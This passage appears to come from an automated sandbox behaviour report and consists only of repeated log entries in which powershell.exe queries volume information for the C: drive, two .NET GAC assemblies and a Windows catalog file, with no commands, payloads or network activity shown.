Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
